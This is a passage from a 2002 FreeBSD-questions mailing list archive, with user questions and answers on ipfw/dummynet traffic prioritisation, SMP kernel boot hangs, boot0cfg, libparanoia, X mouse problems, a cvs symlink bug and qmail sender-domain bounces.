4.5R router (with dummynet compiled in the kernel) > running a 64Kbps ISDN line to another site. The line is usually > saturated making access very slow and unreliable for some hosts on the > network. We have one host (192.168.0.50) on the network that is > particularly important and which requires priority access. So I added > the following rules, but this does not seem to help: > > ipfw pipe 1 config bw 64Kbit/s > ipfw queue 1 config pipe 1 weight 90 > ipfw queue 2 config pipe 1 weight 1 > ipfw add 400 queue 1 tcp from 192.168.0.50 to any > ipfw add 500 queue 2 ip from any to any > > > What am I doing wrong? I delayed posting this because I'm not sure this answer is correct. I think you need to have both in and out traffic handled or your priority won't work, because outgoing traffic will be at higher prioriy, but incomming will be relegated to the lower priority, thus your overall priority won't be improved any. Maybe something like: ipfw pipe 1 config bw 64Kbit/s ipfw queue 1 config pipe 1 weight 90 ipfw queue 2 config pipe 1 weight 1 ipfw add 400 queue 1 tcp from 192.168.0.50 to any ipfw add 450 queue 1 tcp from any to 192.168.0.50 ipfw add 500 queue 2 ip from any to any See if that helps. And again, I'm not sure I have the right answer for you, so take it with a grain of salt. Also, make sure the traffic you're trying to prioritize is travelling on tcp, if not, it will be running at the lower priority. -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 20: 8: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from snickers.hotpop.com (snickers.hotpop.com [204.57.55.49]) by hub.freebsd.org (Postfix) with ESMTP id 6F65137B403 for ; Sun, 23 Jun 2002 20:08:03 -0700 (PDT) Received: from hotpop.com (kubrick.hotpop.com [204.57.55.16]) by snickers.hotpop.com (Postfix) with SMTP id E4EFA7C8DF for ; Mon, 24 Jun 2002 03:07:52 +0000 (UTC) Received: from kamisama (unknown [64.86.20.115]) by zagnut.hotpop.com (Postfix) with ESMTP id 3581750021 for ; Mon, 24 Jun 2002 03:07:48 +0000 (UTC) Date: Sun, 23 Jun 2002 23:07:46 -0400 From: C To: freebsd-questions@freebsd.org Subject: System running from CD Message-Id: <20020623230602.9864.CACEROLA@hotpop.com> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.00.11 X-HotPOP: ----------------------------------------------- Sent By HotPOP.com FREE Email Get your FREE POP email at www.HotPOP.com ----------------------------------------------- Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi all. Has any of you run your system from a CD? I read somewhere that it is possible, and that, for security reasons, it is very good, as nothing can be modified in a CD. And in the case of a root compromise, you just need to reboot. Well, of course, there are some things that need to be modified, which you can run from a filesystem in RAM ... or something like that. And in the case of the compromise you'll need to fix it, of course. Have you tried this? Comments welcome. Thanks. Bye all. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 20:16:51 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14806.mail.yahoo.com (web14806.mail.yahoo.com [216.136.224.222]) by hub.freebsd.org (Postfix) with SMTP id 4D89C37B403 for ; Sun, 23 Jun 2002 20:16:45 -0700 (PDT) Message-ID: <20020624031644.21901.qmail@web14806.mail.yahoo.com> Received: from [165.247.109.174] by web14806.mail.yahoo.com via HTTP; Sun, 23 Jun 2002 20:16:44 PDT Date: Sun, 23 Jun 2002 20:16:44 -0700 (PDT) From: mingo lu Subject: SMP problems To: freebsd-questions MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-392706432-1024888604=:21699" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --0-392706432-1024888604=:21699 Content-Type: text/plain; charset=us-ascii Hi: I am trying to build SMP kernel with my dual-cpu machine (compaq proliant) and failed. atcually it was compiled with no error. After reboot, it hanged up at : ..... Change APIC ID for IO APIC #0 from 0 to 2 on chip Programming 24 pins in IOAPIC #0 IOAPIC #O intpin 2 -> irq 0 The booting process never went beyond this,ust hanged at this point. I checked kernel file and found there were no lines (options NCPU, NBUS, NAPIC and NINTR). I added those lines and tried to recomplied it; the compilation was failed: KERNEL:74: unknown option "NINTR" *** Error code 1 Stop in /usr/src Help!!! TIA _mingo --------------------------------- Do You Yahoo!? Sign-up for Video Highlights of 2002 FIFA World Cup --0-392706432-1024888604=:21699 Content-Type: text/html; charset=us-ascii

Hi:

 

I am trying to build SMP kernel with my dual-cpu machine (compaq proliant) and failed. atcually it was compiled with no error. After reboot, it hanged up at :

 

.....

Change APIC ID for IO APIC #0 from 0 to 2 on chip

Programming 24 pins in IOAPIC #0

IOAPIC #O intpin 2 -> irq 0

 

The booting process never went beyond this,ust hanged at this point.

 

I checked kernel file and found there were no lines (options NCPU, NBUS, NAPIC and NINTR). I added those lines and tried to recomplied it; the compilation was failed:

 

KERNEL:74: unknown option "NINTR"

*** Error code 1

Stop in /usr/src

 

Help!!!

 

TIA

 

_mingo

 



Do You Yahoo!?
Sign-up for Video Highlights of 2002 FIFA World Cup --0-392706432-1024888604=:21699-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 20:40:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail15b.boca15-verio.com (mail15b.boca15-verio.com [208.55.91.59]) by hub.freebsd.org (Postfix) with SMTP id AACF137B400 for ; Sun, 23 Jun 2002 20:40:44 -0700 (PDT) Received: from www.building2.co.jp (128.241.143.235) by mail15b.boca15-verio.com (RS ver 1.0.63s) with SMTP id 027073 for ; Sun, 23 Jun 2002 23:40:37 -0400 (EDT) From: "Changpeng Zhao" To: Subject: user forum Date: Mon, 24 Jun 2002 12:43:40 +0900 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0008_01C21B7C.C44F2110" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Importance: Normal X-Loop-Detect: 1 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0008_01C21B7C.C44F2110 Content-Type: text/plain; charset="iso-2022-jp" Content-Transfer-Encoding: 7bit Why don't you set up an online user-forum? Forums are far better than mailings list and newsgroups for user (peer-to-peer) support. There are free forum packages out there and the installation is very easy. Just a though. Changpeng Zhao ------=_NextPart_000_0008_01C21B7C.C44F2110 Content-Type: text/html; charset="iso-2022-jp" Content-Transfer-Encoding: quoted-printable
Why=20 don't you set up an online user-forum?
 
Forums=20 are far better than mailings list and newsgroups for user (peer-to-peer) = support.  There are free forum packages out there and the = installation is=20 very easy.
 
Just a=20 though.
 
Changpeng Zhao
------=_NextPart_000_0008_01C21B7C.C44F2110-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 20:54:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail5.triad.rr.com (fe5.southeast.rr.com [24.93.67.52]) by hub.freebsd.org (Postfix) with ESMTP id DC38237B401 for ; Sun, 23 Jun 2002 20:54:26 -0700 (PDT) Received: from 2kpro2 ([24.28.234.101]) by mail5.triad.rr.com with Microsoft SMTPSVC(5.5.1877.757.75); Sun, 23 Jun 2002 23:54:19 -0400 Message-ID: <023a01c21b32$f0ddfcf0$2201a8c0@2kpro2> From: "Joe Joplin" To: "Pietralla, Siegfried P" , "Ian Dowse" Cc: References: <200206240244.aa47440@salmon.maths.tcd.ie> Subject: Re: yet another boot problem Date: Sun, 23 Jun 2002 23:55:12 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG How do you do this, if you can't boot? Joe Subject: Re: yet another boot problem > A beep when you press an F-key usually means that boot0 is unable > to read the boot sector for the partition you selected, either > because the geometry settings in the fdisk partition table don't > match the BIOS, or because the cylinder number is greater than 1023. > Try telling boot0 to use packet mode by running: > > boot0cfg -v -o packet /dev/ad3 > > This will cause boot0 to ignore the geometry and use LBA addressing > instead. > > Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 22:23:31 2002 Delivered-To: freebsd-questions@freebsd.org Received: from probsd.ws (ilm26-7-034.ec.rr.com [66.26.7.34]) by hub.freebsd.org (Postfix) with ESMTP id DD19D37B400; Sun, 23 Jun 2002 22:23:25 -0700 (PDT) Received: from probsd.ws (probsd.ws [192.168.1.4]) by probsd.ws (8.12.4/8.12.4) with SMTP id g5O5P3Il094383; Mon, 24 Jun 2002 01:25:03 -0400 (EDT) (envelope-from freebsd@ec.rr.com) Received: from 192.168.1.4 (SquirrelMail authenticated user ms) by webmail.probsd.ws with HTTP; Mon, 24 Jun 2002 01:25:03 -0400 (EDT) Message-ID: <1470.192.168.1.4.1024896303.squirrel@webmail.probsd.ws> Date: Mon, 24 Jun 2002 01:25:03 -0400 (EDT) Subject: libparanoia From: "Michael Sharp" To: X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: X-Mailer: SquirrelMail (version 1.2.7) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I want to utilize libparanoia on my system and just installed the port. However, in reading the pkg-descr, I dont understand how to do this part: -- snip -- you can just install it as a port/package, and then relink critical applications (such as a network daemons) with -lparanoia -L/usr/local/lib , or you can override standard functions in libc (using libparanoia/copy-to-libc shell script) - in this case you'll get any application,which uses shared libc, automatically protected. -- snip -- Can anyone using libparanoia suggest which method ( the shell script method or relinking critical applications ) is the best, and how to go about doing either? Thx, Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 22:30: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from andrsn.stanford.edu (andrsn.Stanford.EDU [171.66.112.163]) by hub.freebsd.org (Postfix) with ESMTP id C457537B400 for ; Sun, 23 Jun 2002 22:30:00 -0700 (PDT) Received: from localhost (localhost.stanford.edu [127.0.0.1]) by andrsn.stanford.edu (8.11.6/8.11.6) with ESMTP id g5O5Mxw01650; Sun, 23 Jun 2002 22:22:59 -0700 (PDT) (envelope-from andrsn@andrsn.stanford.edu) Date: Sun, 23 Jun 2002 22:22:59 -0700 (PDT) From: Annelise Anderson To: "Philip J. Koenig" Cc: questions@FreeBSD.ORG Subject: Re: Kernelbuild "the new way" (Was: APM not even a sign) In-Reply-To: <20020624013725669.AAA723@empty1.ekahuna.com@pc02.ekahuna.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 23 Jun 2002, Philip J. Koenig wrote: > So what's the downside of using the "new way" to rebuild a kernel on > an existing system who hasn't had its source upgraded since the last > build? > > That's been what I've always done - relatively new FreeBSD user that > I am (since 4.1). Any reason not to do it that way? > There is no down side; on a system in which the sources for the base system have been built and installed (i.e., installworld has been done) they are equivalent. The kernel will end up (before it's installed) in the /usr/obj hierarchy, however, just in case you want to build one and not install it (e.g., building a kernel.GENERIC). Annelise -- Annelise Anderson Author of: FreeBSD: An Open-Source Operating System for Your PC Available from: BSDmall.com and amazon.com Book Website: http://www.bittreepress.com/FreeBSD/introbook/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 22:55:17 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cerebellum.za.net (cerebellum.za.net [196.34.172.103]) by hub.freebsd.org (Postfix) with ESMTP id B68DA37B40D for ; Sun, 23 Jun 2002 22:55:10 -0700 (PDT) Received: from berthome (vic-dial-196-30-239-42.mweb.co.za [196.30.239.42]) by cerebellum.za.net (8.11.6/8.11.3) with SMTP id g5O63VG91042 for ; Mon, 24 Jun 2002 06:03:32 GMT (envelope-from ian@cerebellum.za.net) From: "Ian Barnes" To: Subject: X and my mouse Date: Mon, 24 Jun 2002 07:56:54 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, I have seen a few posts about mice and X4.2.0 this week, *thinking something wrong*. I have a problem. My X config is set to sysmouse, when i go into X, (i use kde), i cant click on anything. It works some of the time, but then i might have to click 7-10 times before it takes one click. My machine isnt lagged. It just doesnt want to click. I am running XFree86-4.2.0 with KDE3.0 on my FreeBSD 4.6Stable box. In my rc.conf ... i have moused_enable="YES", it is a ps/2 mouse, that is loaded via console using moused -t auto -p /dev/psm0, that works fine. My mouse type is Mecer (something or other). Someone please help Regards Ian Barnes ------------------------ BOFH - Mom's Pharmacies Emal: ian@cerebellum.za.net ------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 23:39:32 2002 Delivered-To: freebsd-questions@freebsd.org Received: from astnet.astelit.ru (astnet.astelit.ru [195.96.64.250]) by hub.freebsd.org (Postfix) with ESMTP id 96EA637B40F for ; Sun, 23 Jun 2002 23:37:43 -0700 (PDT) Received: from 195.96.69.5 ([195.96.69.5]) by astnet.astelit.ru (8.12.2/8.12.2) with ESMTP id g5O6bgfN012084 for ; Mon, 24 Jun 2002 10:37:44 +0400 (MSD) Date: Mon, 24 Jun 2002 10:37:07 +0400 From: Alexander Isaev X-Mailer: The Bat! (v1.60q) Reply-To: Alexander Isaev X-Priority: 3 (Normal) Message-ID: <131084140.20020624103707@astelit.ru> To: questions@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 23:43:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from seven.slakin.net (adsl-67-112-126-134.dsl.pltn13.pacbell.net [67.112.126.134]) by hub.freebsd.org (Postfix) with ESMTP id 7C58337B403 for ; Sun, 23 Jun 2002 23:43:31 -0700 (PDT) Received: from localhost (localhost.slakin.net [127.0.0.1]) by seven.slakin.net (Postfix) with ESMTP id 4E610824; Sun, 23 Jun 2002 23:43:39 -0700 (PDT) Date: Sun, 23 Jun 2002 23:43:39 -0700 (PDT) From: Matt Snow To: Steve Warwick Cc: freebsd-questions@FreeBSD.ORG Subject: Re: [OFF] Pentium vs Athlon which is better In-Reply-To: Message-ID: <20020623234217.N24434-100000@seven.slakin.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG DDR RAM is very, very fast. When I built a DDR/Athlon system for a friend I was amazed at the speed increase. But I believe DDR is available for both Intel and AMD motherboards now. * * * * * * * * Matt Snow (@) drama@slakin.net (w) http://slakin.net. On Sun, 23 Jun 2002, Steve Warwick wrote: > Hi all, > > Since I received a bunch of helpful responses to my last question I though I > would try one more before I go off and build. > > Pentium vs Athlon: > > Building a generic PC system as a webserver (Apache/PHP/MySQL/Email), paying > attention to the FreeBSD Hardware Compatibility List, would anyone care to > venture their opinion as to which processor is better? > > As an addendum, any opinion on components? [motherboard, ram, HD, NIC etc] > > Thanks to all for their helpful input. > > Steve > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 23:54: 7 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.thundernet.cz (mail.thundernet.cz [62.77.87.114]) by hub.freebsd.org (Postfix) with SMTP id CED5037B403 for ; Sun, 23 Jun 2002 23:54:02 -0700 (PDT) Received: (qmail 9835 invoked from network); 24 Jun 2002 06:52:17 -0000 Received: from unknown (HELO freepuppy.bellavista.cz) (62.168.44.50) by mail.thundernet.cz with SMTP; 24 Jun 2002 06:52:17 -0000 Received: from freepuppy.bellavista.cz (localhost.bellavista.cz [127.0.0.1]) by freepuppy.bellavista.cz (8.12.4/8.11.6) with ESMTP id g5O6rv4o001503 for ; Mon, 24 Jun 2002 08:53:58 +0200 (CEST) (envelope-from neuhauser@bellavista.cz) Received: (from roman@localhost) by freepuppy.bellavista.cz (8.12.4/8.12.4/Submit) id g5O6ru6k001502 for freebsd-questions@freebsd.org; Mon, 24 Jun 2002 08:53:56 +0200 (CEST) X-Authentication-Warning: freepuppy.bellavista.cz: roman set sender to neuhauser@bellavista.cz using -f Date: Mon, 24 Jun 2002 08:53:56 +0200 From: Roman Neuhauser To: freebsd-questions Subject: cvs symlink bug Message-ID: <20020624065356.GA328@freepuppy.bellavista.cz> Mail-Followup-To: freebsd-questions Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi there, I'm getting bitten by a bug in cvs which I wouldn't describe better than it was done in this email, so I'll just paste: cvs gets confused with symlinks and cvs root directories that are accessed via symlinks, when we specify a cvs lock directory. (see http://www.mail-archive.com/bug-cvs@gnu.org/msg02916.html) If you e. g. attempt cvs -d :pserver:user@host:/home/cvs co -r TAG module where /home is a symlink to /usr/home, cvs will die with "assertion failed". Since the cvs maintainers squashed this bug their favorite way ("don't do that"), and to my knowledge haven't expressed intent to really fix it, I'd like to ask if there's any interest in having this fixed in the BSD-specific patches to cvs which AFAIK contain useful stuff refused by the cvs people? -- FreeBSD 4.6-STABLE 8:43AM up 5:42, 4 users, load averages: 0.05, 0.02, 0.00 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 0: 1:43 2002 Delivered-To: freebsd-questions@freebsd.org Received: from aurora.5ci.lt (aurora.5ci.net [212.122.64.14]) by hub.freebsd.org (Postfix) with ESMTP id AB29537B419 for ; Mon, 24 Jun 2002 00:01:28 -0700 (PDT) Received: by AURORA with Internet Mail Service (5.5.2655.55) id ; Mon, 24 Jun 2002 09:01:26 +0200 Message-ID: From: Simas Cepaitis To: 'O Senhor' Cc: FreeBSD-questions Subject: RE: mysql Date: Mon, 24 Jun 2002 09:01:21 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.55) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, > -----Original Message----- > From: O Senhor [mailto:osenhor@uol.com.br] > Sent: Friday, June 21, 2002 9:25 PM > To: Hyunseog Ryu > Cc: FreeBSD-questions > Subject: Re: mysql > > > Hello again... thanks by the answers, but as i sad: I have three > partitions read-only: "/" /usr and /usr/local. The other > partitions are > read/write. What other partitions? Do you have separate /tmp partition? Simas Cepaitis simas@5ci.lt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 1:36:45 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx1.ovh.net (b1.ovh.net [213.186.33.51]) by hub.freebsd.org (Postfix) with ESMTP id 9F9FD37B4B5 for ; Mon, 24 Jun 2002 00:20:20 -0700 (PDT) Received: (qmail 8886 invoked by uid 503); 24 Jun 2002 07:19:34 -0000 Received: from unknown (HELO gueway.home) (212.43.212.24) by ns0.ovh.net with DES-CBC3-SHA encrypted SMTP; 24 Jun 2002 07:19:34 -0000 Received: from greatoak.home (greatoak.home [192.168.1.2]) by gueway.home (8.12.2/8.12.2) with ESMTP id g5O7K3Tv007477; Mon, 24 Jun 2002 09:20:08 +0200 (CEST) (envelope-from pcasidy@greatoak.home) Message-Id: <200206240720.g5O7K3Tv007477@gueway.home> Date: Mon, 24 Jun 2002 09:22:27 +0200 (CEST) From: Philippe CASIDY Subject: Re: Custom dirs for ports To: valencia@cicese.mx Cc: freebsd-questions@freebsd.org In-Reply-To: <3D14D859.9030402@cicese.mx> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 22 Jun, Daniel Jesús Valencia Sánchez wrote: > Hi there... > > how can I arrange to make a port toinstall in a directory I want?? for > example, to install jdk into /usr/local/java/jdk-1.3.x or whatever? > man ports suggest to set the PREFIX variable. Phil. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 1:39:45 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cicero0.cybercity.dk (cicero0.cybercity.dk [212.242.40.52]) by hub.freebsd.org (Postfix) with ESMTP id C09B337B4EA for ; Mon, 24 Jun 2002 01:36:23 -0700 (PDT) Received: from user5.cybercity.dk (fxp0.user5.ip.cybercity.dk [212.242.41.51]) by cicero0.cybercity.dk (Postfix) with ESMTP id B5128102A42 for ; Mon, 24 Jun 2002 09:32:06 +0200 (CEST) Received: from webmail.netlink.se (webmail.cybercity.dk [212.242.40.37]) by user5.cybercity.dk (Postfix) with SMTP id 46366F5 for ; Mon, 24 Jun 2002 09:32:06 +0200 (CEST) Reply-To: thrawn@linux.nu From: thrawn@linux.nu (Mattias Björk) To: freebsd-questions@freebsd.org Subject: qmail and domain problems Date: Mon, 24 Jun 2002 09:32:06 +0200 Message-Id: <3d16caf652e5b7.13532844@not right> X-Authenticated-IP: [62.66.14.14] X-Sender: sfp1638@post.netlink.se X-Mailer: Cybercity Webmail 1.06 (http://webmail.cybercity.dk/) MIME-version: 1.0 Content-type: multipart/mixed; boundary="=_3d16caf652ee73.01858996=_"; Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. --=_3d16caf652ee73.01858996=_ Content-Type: text/plain; charset="iso-8859-1" Hi, I have a qmail/domain problem. I have an internal domain server serving as a cache and domain server for the internal network. And the domain that I use only work on in my LAN. So im woundering if there are any ways of config qmail to no deliver mail from thrawn.birch.se because that is my internal domain.I does not exist on the outside of my lan. Im using mutt as my MUA,and set from=thrawn@linux.nu in my .muttrc to deliver from that mail. Because if I you do not put that line, it tryies to deliver from thrawn@thrawn.birch.se and that do not work at all. But this do not help if i want to send an email to this list or freebsd-stable@freebsd.org.Bacause my MTA is trying to send my mail from thrawn@thrawn.birch.se with the email of thrawn@linux.nu and freebsd MTA don't like that. I know this is not a FreeBSD question. But any way, mayby somebody could help me out any way or point me in the right direction. It worked finne when I was using pine4 as my MUA. But I did not get pine4 to work with Maildir, and I heard that mutt hade Maildir support as default. So i switched to Maildir and mutt. But then i come across this problem. I have attached a file with the error from my MTA when trying to send mail to this list. I have read the FAQ to qmail but I don't know what im looking for and I don't seem to find anything intresting. There must be some kind of way to make qmail do something other with the mail that are not internal. Mayby it is possible to forward them to my ISP MTA and then the will send it on to the FreeBSD mailing lists? Thanks in advance. Mvh Mattias Björk --=_3d16caf652ee73.01858996=_ Content-Type: application/octet-stream Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="error" UmV0dXJuLVBhdGg6IDw+CkRlbGl2ZXJlZC1UbzogdGhyYXduQHRocmF3bi5iaXJjaC5zZQpS ZWNlaXZlZDogKHFtYWlsIDcxNDQ3IGludm9rZWQgZm9yIGJvdW5jZSk7IDIzIEp1biAyMDAy IDE1OjExOjM1IC0wMDAwCkRhdGU6IDIzIEp1biAyMDAyIDE1OjExOjM1IC0wMDAwCkZyb206 IE1BSUxFUi1EQUVNT05AdGhyYXduLmJpcmNoLnNlClRvOiB0aHJhd25AdGhyYXduLmJpcmNo LnNlClN1YmplY3Q6IGZhaWx1cmUgbm90aWNlCkNvbnRlbnQtTGVuZ3RoOiA5MTEKCkhpLiBU aGlzIGlzIHRoZSBxbWFpbC1zZW5kIHByb2dyYW0gYXQgdGhyYXduLmJpcmNoLnNlLgpJJ20g YWZyYWlkIEkgd2Fzbid0IGFibGUgdG8gZGVsaXZlciB5b3VyIG1lc3NhZ2UgdG8gdGhlIGZv bGxvd2luZyBhZGRyZXNzZXMuClRoaXMgaXMgYSBwZXJtYW5lbnQgZXJyb3I7IEkndmUgZ2l2 ZW4gdXAuIFNvcnJ5IGl0IGRpZG4ndCB3b3JrIG91dC4KCjxmcmVlYnNkLXF1ZXN0aW9uc0Bm cmVlYnNkLm9yZz46CjIxNi4xMzYuMjA0LjE4IGRvZXMgbm90IGxpa2UgcmVjaXBpZW50LgpS ZW1vdGUgaG9zdCBzYWlkOiA1MDEgPHRocmF3bi5iaXJjaC5zZT46IEhlbG8gY29tbWFuZCBy ZWplY3RlZDogSG9zdCBub3QgZm91bmQKR2l2aW5nIHVwIG9uIDIxNi4xMzYuMjA0LjE4LgoK LS0tIEJlbG93IHRoaXMgbGluZSBpcyBhIGNvcHkgb2YgdGhlIG1lc3NhZ2UuCgpSZXR1cm4t UGF0aDogPHRocmF3bkB0aHJhd24uYmlyY2guc2U+ClJlY2VpdmVkOiAocW1haWwgNzE0NDQg aW52b2tlZCBieSB1aWQgMTAyMik7IDIzIEp1biAyMDAyIDE1OjExOjI4IC0wMDAwCkRhdGU6 IFN1biwgMjMgSnVuIDIwMDIgMTc6MTE6MjggKzAyMDAKRnJvbTogVXNlciAmIDx0aHJhd25A bGludXgubnU+ClRvOiBmcmVlYnNkLXF1ZXN0aW9uc0BmcmVlYnNkLm9yZwpTdWJqZWN0OiBU RVNULCBwbGVhc2UgaWdvbnJlCk1lc3NhZ2UtSUQ6IDwyMDAyMDYyMzE3MTEyOC5BNzE0MzJA dGhyYXduLmJpcmNoLnNlPgpNaW1lLVZlcnNpb246IDEuMApDb250ZW50LVR5cGU6IHRleHQv cGxhaW47IGNoYXJzZXQ9aXNvLTg4NTktMQpDb250ZW50LURpc3Bvc2l0aW9uOiBpbmxpbmUK Q29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogOGJpdApVc2VyLUFnZW50OiBNdXR0LzEuMi41 LjFpCgpUZXN0CgpQbGVhc2UgaWdub3JlCgovL01hdHRpYXMgQmr2cmsK --=_3d16caf652ee73.01858996=_-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 1:42: 3 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cicero2.cybercity.dk (cicero2.cybercity.dk [212.242.40.53]) by hub.freebsd.org (Postfix) with ESMTP id 3BFBB37B48F for ; Mon, 24 Jun 2002 01:36:37 -0700 (PDT) Received: from user2.cybercity.dk (fxp0.user2.ip.cybercity.dk [212.242.41.35]) by cicero2.cybercity.dk (Postfix) with ESMTP id 215A9FFF45 for ; Mon, 24 Jun 2002 09:40:09 +0200 (CEST) Received: from webmail.netlink.se (webmail.cybercity.dk [212.242.40.37]) by user2.cybercity.dk (Postfix) with SMTP id BCEB854DB for ; Mon, 24 Jun 2002 09:40:08 +0200 (CEST) Reply-To: thrawn@linux.nu From: thrawn@linux.nu (Mattias Björk) To: freebsd-questions@freebsd.org Subject: TV-Card problem with sound Date: Mon, 24 Jun 2002 09:40:09 +0200 Message-Id: <3d16ccd9115fe1.32604773@not right> X-Authenticated-IP: [62.66.14.14] X-Sender: sfp1638@post.netlink.se X-Mailer: Cybercity Webmail 1.06 (http://webmail.cybercity.dk/) MIME-version: 1.0 Content-type: text/plain; charset="iso-8859-1" 